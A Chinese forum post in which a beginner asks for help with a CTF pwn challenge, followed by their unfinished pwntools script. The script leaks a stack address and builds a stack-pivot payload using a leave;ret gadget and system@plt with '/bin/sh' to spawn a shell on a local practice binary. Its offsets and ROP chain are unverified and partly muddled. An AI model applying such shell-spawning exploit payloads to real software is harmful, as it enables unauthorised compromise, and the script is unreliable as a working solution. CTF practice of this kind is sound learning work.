你们好，我是一个 PWN 新手，入门 pwn 不久。做了一道题，我觉得是 stack pivot，已经把栈劫持到我可以写的区域，但是不会写 ROP。这道题我做了很久，很想得到答案，求助～～谢谢帮助我的人。
from pwn import *
#breakpoints=[0x80485b9,0x80485E0]
# Work-in-progress solver for the local './pwn2' challenge binary (from the post:
# the author believes it is a stack pivot and has not finished the ROP part).
# Flow as written: send a padding string, read back a 4-byte value after the
# echoed padding, derive a buffer address from it, then send a second payload
# that ends with that address followed by a leave;ret gadget address.
#
# NOTE(review): payloads are built as str + p32(...) concatenations, which only
# works with Python 2 pwntools; under Python 3 str + bytes raises TypeError.
# NOTE(review): every address below is an absolute 0x0804xxxx constant, so the
# script presumes a non-PIE binary — confirm (e.g. with checksec) before reuse.
sh = process('./pwn2')
# Parsed ELF; only .plt['system'] is read from it below.
pwn2 = ELF('./pwn2')
# Number of 'a' bytes in the first send; per the recvuntil below the program
# echoes them back followed by '\n', and the 4 bytes after that are read.
offset = 0x27
# The following constants are defined but never referenced in this script:
# system_plt, get_flag, call_system, read_plt, cmd, data_addr.
system_plt = 0x8048400
get_flag = 0x804854B
call_system = 0x8048559
# Address of a leave;ret gadget (per the name) — used as the final word of payload2.
leave_ret_addr = 0x080484b8
read_plt = 0x80483D0
cmd = '/bin/sh'
data_addr = 0x804a028
# Debugger attach left commented out; the breakpoint list in the header
# comment presumably goes with it.
#gdb.attach(sh)
# --- stage 1: padding send, then read the 4 bytes that follow the echo ---
payload1 = 'a'*offset
sh.sendline(payload1)
# Waits for the echoed padding plus newline; whatever the program prints next
# is consumed as the leaked value.
sh.recvuntil('a'*offset+'\x0a')
# 4 bytes, little-endian; treated as a stack (ebp) value per the variable name —
# the script does not verify it.
ebp_addr = u32(sh.recv(4))
log.success('ebp_addr:'+str(hex(ebp_addr)))
# Assumed distance from the leaked value to the start of the input buffer —
# TODO confirm against the binary's frame layout.
buf_addr = ebp_addr-0x38
# --- stage 2: second payload, sent into the same buffer ---
# Marker bytes; also used below as the recvuntil anchor.
payload2 = '1111'
payload2 += p32(pwn2.plt['system'])
payload2 += p32(0xdeadbeef)
# Raw 7-byte string (no terminator appended here; ljust below pads with NULs).
payload2 += '/bin/sh'
payload2 += p32(pwn2.plt['system'])
payload2 += p32(0xdeadbeef)
# Pointer 12 bytes past the assumed buffer start.
payload2 += p32(buf_addr+0x0c)
# NUL-pad to 0x28 bytes, then the two words that follow the buffer:
# the value that will be loaded into ebp, and the leave;ret address.
payload2 = payload2.ljust(0x28,'\x00')
payload2 += p32(buf_addr)
payload2 += p32(leave_ret_addr)
# sendline appends '\n' after the gadget address.
sh.sendline(payload2)
# Sync on the marker echo before handing the session to the user.
sh.recvuntil('1111')
sh.interactive()